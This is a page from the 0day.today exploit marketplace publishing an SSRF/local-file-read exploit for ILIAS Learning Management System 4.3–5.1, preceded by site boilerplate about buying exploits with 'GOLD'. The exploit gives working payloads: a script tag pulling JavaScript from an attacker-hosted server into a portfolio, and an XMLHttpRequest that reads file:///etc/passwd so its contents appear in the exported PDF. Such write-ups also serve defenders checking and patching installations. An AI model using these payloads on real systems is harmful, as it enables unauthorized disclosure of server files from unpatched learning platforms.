0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
ILIAS Learning Management System 4.3 - SSRF Vulnerability
# Exploit Title: ILIAS Learning Management System 4.3 - SSRF # Exploit Author: Dot/kx1z0 # Vendor Homepage: https://www.ilias.de/ # Software Link: https://github.com/ILIAS-eLearning/ILIAS/tree/release_4-3 # Version: 4.3-5.1 # Tested on: Linux # Description We can create portfolios, export them to PDF and download them. The issue is that there is an HTML Injection, and if we inject HTML into the portfolio, when it is exported to PDF, it will be rendered. So we can take advantage that it is running under the wrapper file:// to inject an XMLHttpRequest requesting the local file we want, that when downloading the PDF, we can see the content of that file # Exploit We cannot inject the XMLHttpRequest directly into the content of the portfolio, as there is something blocking it. So we will have to host a script in our own server and invoke it from the portfolio We insert this in the portfolio: <script src=host.com/test.js> </script> Script in our server: x=new XMLHttpRequest; x.onload=function(){ document.write(this.responseText) }; x.open("GET","file:///etc/passwd"); x.send(); So, finally, we will only have to download the PDF and there, will be the content of the file we have requested. # 0day.today [2024-12-24] #